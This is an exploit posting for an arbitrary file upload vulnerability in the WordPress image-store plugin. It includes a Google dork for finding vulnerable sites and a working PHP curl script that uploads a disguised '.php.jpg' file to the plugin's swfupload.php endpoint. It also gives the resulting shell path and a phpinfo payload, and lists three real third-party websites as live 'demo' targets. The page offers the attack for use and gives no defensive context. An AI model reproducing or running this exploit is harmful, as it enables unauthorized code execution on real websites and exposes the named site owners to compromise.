facebook facebook twitter rss

Wordpress Plugins - image-store Arbitrary File Upload Vulnerability

Author: Zikou-16 , Published: 30-11-2012
 -------------------------------------------------------------------------------
Wordpress Plugins - image-store Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/plugins/image-store"
#
#######################################################################################

---------------------------------------------------------------------------------------

Exploit : uploadshell.php.jpg or .gif

<?php

$uploadfile
="dz.php.jpg";

$ch curl_init("http://www.localhost/wp-content/plugins/image-store/admin/swfupload.php?folder=/wp-content/plugins/image-store/_img/");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";

?>


Shell Access : http://www.localhost/wp-content/plugins/image-store/_img/dz.php.jpg

dz.php.jpg
<?php
phpinfo
();
?>


---------------------------------------------------------------------------------------

Demo :

1) http://www.vpf.com.br/vpfstudio/wp-content/plugins/image-store/admin/swfupload.php

2) http://www.almanaquesviejos.com/wp-content/plugins/image-store/admin/swfupload.php

3) http://shantimix.com/photography/wp-content/plugins/image-store/admin/swfupload.php

-----------------------------------------------------------------------------------------

Like us on Facebook :